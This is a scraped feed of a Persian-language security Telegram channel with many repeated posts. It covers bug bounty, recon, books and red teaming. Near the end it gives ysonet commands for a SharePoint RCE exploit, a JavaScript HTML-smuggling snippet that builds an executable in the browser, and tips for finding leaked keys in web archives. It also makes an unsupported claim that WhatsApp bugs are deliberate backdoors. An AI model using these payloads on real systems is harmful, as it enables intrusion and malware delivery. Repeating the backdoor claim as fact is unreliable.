RadvanSec
باگهایی که با پاداشهای بزرگ همراه هستن، لزومی نداره صرفاً از مهارتهای فنی نشأت بگیرن. خیلی از اونا حاصل این مواردن: ۱- خطای انسانی (Human Error) ۲- بیتوجهی تیمها به اصول پایه ۳- ضعف در ساختار تیم DevSecOps ۴- یا حتی فقط عجله در دیپلوی یه فیچر قبل از…
“ تو ماشین تست نیستی ”
اگه امروز مثل یه ابزار فکر کنی، فردا با ابزار جایگزین میشی.
ولی اگه مثل یه مهاجم واقعی فکر کنی، غیرقابل تکرار میشی.
بخشی از نگرش جدید یک هکر واقعی:
کمتر ابزار، بیشتر تحلیل ذهنی
ترکیب فنی + روانشناسی + OSINT
نگاه سیستمی به سازمان هدف
تفکر مثل insider یا red team
و در کل استایل هانت کردن شما خیلی مهمه✌️
──────────────
📡 Follow :
👉 @zerosec_team
اگه امروز مثل یه ابزار فکر کنی، فردا با ابزار جایگزین میشی.
ولی اگه مثل یه مهاجم واقعی فکر کنی، غیرقابل تکرار میشی.
بخشی از نگرش جدید یک هکر واقعی:
کمتر ابزار، بیشتر تحلیل ذهنی
ترکیب فنی + روانشناسی + OSINT
نگاه سیستمی به سازمان هدف
تفکر مثل insider یا red team
و در کل استایل هانت کردن شما خیلی مهمه✌️
سعی کنید تفکر black داشته باشید ولی نتیجه white hat باشید
──────────────
📡 Follow :
👉 @zerosec_team
❤2🔥1💯1
تلویزیون های اسنوا هک شده و هیچی بالا نمیاره
شایعاتی هست که میگه پول طرف چینی رو ندادن اونام قطع کردنشون
(تلفن ۱۶۹۶ پاسخگو اسنوا هم از دسترس خارج کردن کسی تو پشتیبانی پاسخگو نیست)
⭐️ @ZeroSec_team
شایعاتی هست که میگه پول طرف چینی رو ندادن اونام قطع کردنشون
(تلفن ۱۶۹۶ پاسخگو اسنوا هم از دسترس خارج کردن کسی تو پشتیبانی پاسخگو نیست)
⭐️ @ZeroSec_team
🤣5😁1
📏 استاندارد اجرای تست نفوذ (PTES)
این استاندارد، یکی از کاملترین و شناختهشدهترین مدلها برای انجام تست نفوذ حرفهایه. اکثر تیمهای امنیتی به این مدل استناد میکنن چون ساختاری منطقی و مرحله به مرحله ارائه میده.
Pre-engagement Interactions
تعاملات و توافقهای اولیه با مشتری قبل از شروع تست
Intelligence Gathering
جمعآوری اطلاعات اولیه (شناسایی - Recon)
Threat Modeling
مدلسازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)
Vulnerability Analysis
تحلیل آسیبپذیریها
Exploitation
بهرهبرداری (استفاده از آسیبپذیریها)
Post-Exploitation
کارهایی که بعد از Exploit انجام میدیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)
Reporting
تهیه گزارش نهایی تست نفوذ
لینک: Pre-engagement Interactions
تعاملات و توافقهای اولیه با مشتری قبل از شروع تست
Intelligence Gathering
جمعآوری اطلاعات اولیه (شناسایی - Recon)
Threat Modeling
مدلسازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)
Vulnerability Analysis
تحلیل آسیبپذیریها
Exploitation
بهرهبرداری (استفاده از آسیبپذیریها)
Post-Exploitation
کارهایی که بعد از Exploit انجام میدیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)
Reporting
تهیه گزارش نهایی تست نفوذ
پیشنهاد میکنم کامل بخونید نکات خوبی داره :
http://www.pentest-standard.org/
⭐️ @ZeroSec_team
این استاندارد، یکی از کاملترین و شناختهشدهترین مدلها برای انجام تست نفوذ حرفهایه. اکثر تیمهای امنیتی به این مدل استناد میکنن چون ساختاری منطقی و مرحله به مرحله ارائه میده.
Pre-engagement Interactions
تعاملات و توافقهای اولیه با مشتری قبل از شروع تست
Intelligence Gathering
جمعآوری اطلاعات اولیه (شناسایی - Recon)
Threat Modeling
مدلسازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)
Vulnerability Analysis
تحلیل آسیبپذیریها
Exploitation
بهرهبرداری (استفاده از آسیبپذیریها)
Post-Exploitation
کارهایی که بعد از Exploit انجام میدیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)
Reporting
تهیه گزارش نهایی تست نفوذ
لینک: Pre-engagement Interactions
تعاملات و توافقهای اولیه با مشتری قبل از شروع تست
Intelligence Gathering
جمعآوری اطلاعات اولیه (شناسایی - Recon)
Threat Modeling
مدلسازی تهدیدات (تحلیل اینکه چه تهدیدهایی برای سیستم وجود داره)
Vulnerability Analysis
تحلیل آسیبپذیریها
Exploitation
بهرهبرداری (استفاده از آسیبپذیریها)
Post-Exploitation
کارهایی که بعد از Exploit انجام میدیم (مثل حفظ دسترسی، حرکت افقی، رمزها و...)
Reporting
تهیه گزارش نهایی تست نفوذ
پیشنهاد میکنم کامل بخونید نکات خوبی داره :
http://www.pentest-standard.org/
⭐️ @ZeroSec_team
❤3👍1👌1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 22 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 13 new items
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 22 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 13 new items
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
──────────────
📡 Follow :
👉 @zerosec_team
❤2🤩1
#AppSec
#Whitepaper
#Threat_Research
"Application Programming Interface (API):
Vulnerabilities and Risks", Special Report, 2024.
// This report describes 11 common vulnerabilities and 3 risks related to APIs, providing suggestions about how to fix or reduce their impact. Recommendations include using a standard API documentation process, using automated testing, and ensuring the security of the identity and access management system
See also:
]-> API Specification Parser
]-> Tool to detect API auth weaknesses
]-> API Security Vulnerability Scanner
──────────────
📡 Follow :
👉 @zerosec_team
#Whitepaper
#Threat_Research
"Application Programming Interface (API):
Vulnerabilities and Risks", Special Report, 2024.
// This report describes 11 common vulnerabilities and 3 risks related to APIs, providing suggestions about how to fix or reduce their impact. Recommendations include using a standard API documentation process, using automated testing, and ensuring the security of the identity and access management system
See also:
]-> API Specification Parser
]-> Tool to detect API auth weaknesses
]-> API Security Vulnerability Scanner
──────────────
📡 Follow :
👉 @zerosec_team
GitHub
GitHub - NSSL-SJTU/VoAPI2
Contribute to NSSL-SJTU/VoAPI2 development by creating an account on GitHub.
❤2👏1
⭐Advance Search Engine For Hackers⭐
http://shodan.io —> (🌐 Server, 🛠 Vulnerabilities)
http://google.com —> (💁♀️ Dorks)
http://wigle.net —> (☁️ Wifi Networks)
http://grep.app —> (😀 Code Search)
http://app.binaryedge.io —> (💗 Threat Intelligence)
http://onyphe.io —> (🌐 Server)
http://viz.greynoise.io —> (⚡️ Threat Intelligence)
http://censys.io —> (✅ Server)
http://hunter.io —> (✅ Email Addresses)
http://fofa.info —> (✅ Threat Intelligence)
http://zoomeye.org —> (✅ Threat Intelligence)
http://leakix.net —> (✅ Threat Intelligence)
http://intelx.io —> (✅ OSINT)
http://app.netlas.io —> (✅ Attack Surface)
http://searchcode.com —> (💻 Code Search)
http://urlscan.io —> (🤔 Threat Intelligence)
http://publicwww.com —> (🖥 Code Search)
http://fullhunt.io —> (🔒 Attack Surface)
http://socradar.io —> (✅ Threat Intelligence)
http://binaryedge.io —> (🎀 Attack Surface)
http://ivre.rocks —> (🦋 Server)
http://crt.sh —> (💓 Certificate Search)
http://vulners.com —> (👑Vulnerabilities)
http://pulsedive.com —> (🥘 Threat Intelligence)
http://hybrid-analysis.com —> (⭐️ Malware Analysis)
http://threatcrowd.org —> (🕺Threat Intelligence)
http://cve.mitre.org —> (⭐️ Vulnerability Database)
http://haveibeenpwned.com —> (💗 Data Breaches)
http://spyonweb.com —> (❤️ Website Ownership)
http://dnsdumpster.com —> (🌐 DNS Reconnaissance)
http://archive.org —> (🤗 Historical Website Data)
http://certstream.calidog.io —> (🐳 Real-time Certificates)
http://passivetotal.org —> (🪽 Passive DNS Data)
http://wigle.net —> (🌸 Wi-Fi Network Mapping)
http://malshare.com —> (✅ Malware Repository)
http://threatminer.org —> (😍 Threat Intelligence)
http://binaryedge.io —> (🙂 Attack Surface)
http://vuldb.com —> (😳 Vulnerability Database)
http://bgpview.io —> (❌ BGP Information)
http://onionsearchengine.com —> (😳 Dark Web Search)
⭐@ZeroSec_team
http://shodan.io —> (🌐 Server, 🛠 Vulnerabilities)
http://google.com —> (💁♀️ Dorks)
http://wigle.net —> (☁️ Wifi Networks)
http://grep.app —> (😀 Code Search)
http://app.binaryedge.io —> (💗 Threat Intelligence)
http://onyphe.io —> (🌐 Server)
http://viz.greynoise.io —> (⚡️ Threat Intelligence)
http://censys.io —> (✅ Server)
http://hunter.io —> (✅ Email Addresses)
http://fofa.info —> (✅ Threat Intelligence)
http://zoomeye.org —> (✅ Threat Intelligence)
http://leakix.net —> (✅ Threat Intelligence)
http://intelx.io —> (✅ OSINT)
http://app.netlas.io —> (✅ Attack Surface)
http://searchcode.com —> (💻 Code Search)
http://urlscan.io —> (🤔 Threat Intelligence)
http://publicwww.com —> (🖥 Code Search)
http://fullhunt.io —> (🔒 Attack Surface)
http://socradar.io —> (✅ Threat Intelligence)
http://binaryedge.io —> (🎀 Attack Surface)
http://ivre.rocks —> (🦋 Server)
http://crt.sh —> (💓 Certificate Search)
http://vulners.com —> (👑Vulnerabilities)
http://pulsedive.com —> (🥘 Threat Intelligence)
http://hybrid-analysis.com —> (⭐️ Malware Analysis)
http://threatcrowd.org —> (🕺Threat Intelligence)
http://cve.mitre.org —> (⭐️ Vulnerability Database)
http://haveibeenpwned.com —> (💗 Data Breaches)
http://spyonweb.com —> (❤️ Website Ownership)
http://dnsdumpster.com —> (🌐 DNS Reconnaissance)
http://archive.org —> (🤗 Historical Website Data)
http://certstream.calidog.io —> (🐳 Real-time Certificates)
http://passivetotal.org —> (🪽 Passive DNS Data)
http://wigle.net —> (🌸 Wi-Fi Network Mapping)
http://malshare.com —> (✅ Malware Repository)
http://threatminer.org —> (😍 Threat Intelligence)
http://binaryedge.io —> (🙂 Attack Surface)
http://vuldb.com —> (😳 Vulnerability Database)
http://bgpview.io —> (❌ BGP Information)
http://onionsearchengine.com —> (😳 Dark Web Search)
⭐@ZeroSec_team
Shodan
Search engine of Internet-connected devices. Create a free account to get started.
❤4
🕵️♂️ هک از دل تاریخ: Wayback Machine Bug Bounty
10K$ 💸 بانتی تو همین یه نکته ظاهر ساده خوابیده
تو باگبانتی فقط ابزار جدید مهم نیست... گاهی یه سر به گذشته بزن، شاید یه کلید اونجا جا مونده! 🔑
📦 Wayback Machine رو حتماً توی فاز Recon استفاده کن:
✅ پیدا کردن فایلهایی که حذف شدن ولی تو آرشیو هستن: .env, config.js, debug.log, upload.php
✅ لو رفتن API Keyها یا Tokenهایی که dev فراموش کرده revoke کنه
✅ بررسی تغییرات پروژه تو GitHub، کشف فانکشنها یا endpointهایی که شاید هنوز زندهن
✅ استخراج endpointهای قدیمی از archive.org و تست دوبارهشون
✅ فیشینگ یا abuse با iframeهای oEmbed و iframe injection از نسخههای قبلی سایت
🛠 ابزار پیشنهادی:
#BugBounty #Recon #Wayback #GitHub #InfoLeak #HackSmartNotHard #ZeroSec
⭐ @ZeroSec_team
10K$ 💸 بانتی تو همین یه نکته ظاهر ساده خوابیده
تو باگبانتی فقط ابزار جدید مهم نیست... گاهی یه سر به گذشته بزن، شاید یه کلید اونجا جا مونده! 🔑
📦 Wayback Machine رو حتماً توی فاز Recon استفاده کن:
✅ پیدا کردن فایلهایی که حذف شدن ولی تو آرشیو هستن: .env, config.js, debug.log, upload.php
✅ لو رفتن API Keyها یا Tokenهایی که dev فراموش کرده revoke کنه
✅ بررسی تغییرات پروژه تو GitHub، کشف فانکشنها یا endpointهایی که شاید هنوز زندهن
✅ استخراج endpointهای قدیمی از archive.org و تست دوبارهشون
✅ فیشینگ یا abuse با iframeهای oEmbed و iframe injection از نسخههای قبلی سایت
🛠 ابزار پیشنهادی:
echo "github.com/orgname" | waybackurls > urls.txt
#BugBounty #Recon #Wayback #GitHub #InfoLeak #HackSmartNotHard #ZeroSec
⭐ @ZeroSec_team
👍2❤1🏆1
"اگر ده ساعت وقت داشته باشم برای قطع کردن یک درخت، نه ساعتش را صرف تیز کردن تبرم میکنم."
—آبراهام لینکلن
در دنیای هک و امنیت هم همینطوره:
قبل از حمله، باید وقتت رو بذاری برای شناخت دقیق هدف، جمعآوری اطلاعات (Recon)، تحلیل ساختار، آمادهسازی ابزار و تستهای محلی.
چون یه حملهٔ هوشمندانه و دقیق، از صد تا اسکن کور و اکسپلویت نصفهنیمه ارزشمندتره.
شب بخیر ✨
#RedTeaming #BugBounty #HackerMindset #InfoSec #ZeroSec
⭐ @ZeroSec_team
—آبراهام لینکلن
در دنیای هک و امنیت هم همینطوره:
قبل از حمله، باید وقتت رو بذاری برای شناخت دقیق هدف، جمعآوری اطلاعات (Recon)، تحلیل ساختار، آمادهسازی ابزار و تستهای محلی.
چون یه حملهٔ هوشمندانه و دقیق، از صد تا اسکن کور و اکسپلویت نصفهنیمه ارزشمندتره.
شب بخیر ✨
#RedTeaming #BugBounty #HackerMindset #InfoSec #ZeroSec
⭐ @ZeroSec_team
❤7👏1
📊 Watcher Summary Report
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 68 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 68 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
❤2⚡1👍1
📊 Watcher Summary Report
🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
❤1👍1
Red_Team_How_to_Succeed_by_Thinking_Like_the_Enemy_by_Micah_Zenko.pdf
4 MB
Red Team: How to Succeed By Thinking Like the Enemy — by Micah Zenko
بخونید تا رستگار شوید
#Book #RedTeam #ZeroSec
⭐ @ZeroSec_team
بخونید تا رستگار شوید
#Book #RedTeam #ZeroSec
⭐ @ZeroSec_team
❤2👍1
این اولین بار نیست! آسیبپذیریهای مشابه هر سال از 2017 تا الان گزارش شده:
RCE از طریق تماس تصویری (2019)
اجرای کد با فایل ویدیو (2020)
جاسوسافزار Pegasus روی واتساپ!
احتمال خیلی زیاد تمام این باگ ها تعمدی و backdoor هستند
#امنیت #Whatsapp #Backdoor #Hack
⭐ @ZeroSec_team
RCE از طریق تماس تصویری (2019)
اجرای کد با فایل ویدیو (2020)
جاسوسافزار Pegasus روی واتساپ!
احتمال خیلی زیاد تمام این باگ ها تعمدی و backdoor هستند
#امنیت #Whatsapp #Backdoor #Hack
⭐ @ZeroSec_team
❤4😱1
#tools
#Red_Team_Tactics
Extending AD CS attack surface to the cloud with Intune certificates
https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs
// Hybrid certificate attack paths:
scenarios, recommendations for exploitation and elimination of vulnerabilities
Related tools:
]-> SCEP request tool for AD CS NDES and Intune
]-> Tool for AD Certificate Services enum/abuse
]-> Tools for Kerberos PKINIT and relaying to AD CS
@Zerosec_team
#Red_Team_Tactics
Extending AD CS attack surface to the cloud with Intune certificates
https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs
// Hybrid certificate attack paths:
scenarios, recommendations for exploitation and elimination of vulnerabilities
Related tools:
]-> SCEP request tool for AD CS NDES and Intune
]-> Tool for AD Certificate Services enum/abuse
]-> Tools for Kerberos PKINIT and relaying to AD CS
@Zerosec_team
dirkjanm.io
Extending AD CS attack surface to the cloud with Intune certificates
Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with *checks notes* already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet…
❤3👍1
📊 Watcher Summary Report
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 11 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 11 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❌ BullShit Books :
1. Bug Bounty Bootcamp – Vickie Li
2. Web Hacking 101 – Peter Yaworski
3. Real-World Bug Hunting – Peter Yaworski
4. The Basics of Hacking and Penetration Testing – Patrick Engebretson
5. Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman
6. Hacking Web Apps – Mike Shema
7. The Hacker Playbook 1 – Peter Kim
8. Gray Hat Hacking
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #BullshitBooks #CTF #EthicalHacking #HackTip
⭐️ @ZeroSec_team
1. Bug Bounty Bootcamp – Vickie Li
2. Web Hacking 101 – Peter Yaworski
3. Real-World Bug Hunting – Peter Yaworski
4. The Basics of Hacking and Penetration Testing – Patrick Engebretson
5. Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman
6. Hacking Web Apps – Mike Shema
7. The Hacker Playbook 1 – Peter Kim
8. Gray Hat Hacking
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #BullshitBooks #CTF #EthicalHacking #HackTip
⭐️ @ZeroSec_team
👏5👎1
✅ Nice Books :
1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto
2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)
3. Hacking: The Art of Exploitation – Jon Erickson
4. Advanced Web Attacks and Exploitation – Dafydd Stuttard
5. Web Security for Developers – Malcolm McDonald
6. Real-World Web Application Security – Andrew Hoffman
7. Bug Bounty Hunting Essentials – Carlos A. Lozano
8. Black Hat Python – Justin Seitz
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking
⭐️ @ZeroSec_team
1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto
2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)
3. Hacking: The Art of Exploitation – Jon Erickson
4. Advanced Web Attacks and Exploitation – Dafydd Stuttard
5. Web Security for Developers – Malcolm McDonald
6. Real-World Web Application Security – Andrew Hoffman
7. Bug Bounty Hunting Essentials – Carlos A. Lozano
8. Black Hat Python – Justin Seitz
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking
⭐️ @ZeroSec_team
👍3❤1
DE&TH_Guide_1_3.pdf
2 MB
#DFIR
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.
⭐️ @ZeroSec_team
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.
⭐️ @ZeroSec_team
❤1🙏1
#rce #pentest #redteam #ad #sharepoint #cve
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
Patched: July 20, 2025
⭐️ @ZeroSec_team
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 1 -c "calc"
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 2 -c "C:\\temp\\ExploitClass.cs;System.dll"
Patched: July 20, 2025
⭐️ @ZeroSec_team
GitHub
GitHub - soltanali0/CVE-2025-53770-Exploit: SharePoint WebPart Injection Exploit Tool
SharePoint WebPart Injection Exploit Tool. Contribute to soltanali0/CVE-2025-53770-Exploit development by creating an account on GitHub.
❤4
HTML Smuggling چیه و چرا خطرناکه؟
یه تکنیک خفن تو حملات سایبریه که هکر باهاش میتونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!
یعنی چی؟ یعنی بهجای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML میفرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا میشه و فایل رو از صفر میسازه و به قربانی میده!
مثال:
یه فایل اجرایی که:
نه از نت دانلود شده
نه توی ترافیک دیده میشه
نه فایروال جلوش رو میگیره
و نه حتی آنتیویروس متوجه میشه!
این یکی از روشهای محبوب برای Initial Access هست.
#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess
⭐️ @ZeroSec_team
یه تکنیک خفن تو حملات سایبریه که هکر باهاش میتونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!
یعنی چی؟ یعنی بهجای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML میفرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا میشه و فایل رو از صفر میسازه و به قربانی میده!
مثال:
let file = atob("TVqQAAMAAAAEAAAA...");
let blob = new Blob([Uint8Array.from(file, c => c.charCodeAt(0))]);
let url = URL.createObjectURL(blob);
window.open(url); // یا auto downloadیه فایل اجرایی که:
نه از نت دانلود شده
نه توی ترافیک دیده میشه
نه فایروال جلوش رو میگیره
و نه حتی آنتیویروس متوجه میشه!
این یکی از روشهای محبوب برای Initial Access هست.
#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess
⭐️ @ZeroSec_team
❤5👍2
«سلام به دنیای جدید امنیت با ظهور هوش مصنوعی»
دنیای آیندهی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:
۱. استفاده از AI بهعنوان ابزاری فوقپیشرفته
۲. بهرهگیری از خطاهای انسانی بهعنوان راه ورود
#XBOW #HackerOne #AI #CyberSecurity #RedTeam
⭐️ @ZeroSec_team
دنیای آیندهی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:
۱. استفاده از AI بهعنوان ابزاری فوقپیشرفته
۲. بهرهگیری از خطاهای انسانی بهعنوان راه ورود
#XBOW #HackerOne #AI #CyberSecurity #RedTeam
⭐️ @ZeroSec_team
❤1🔥1😱1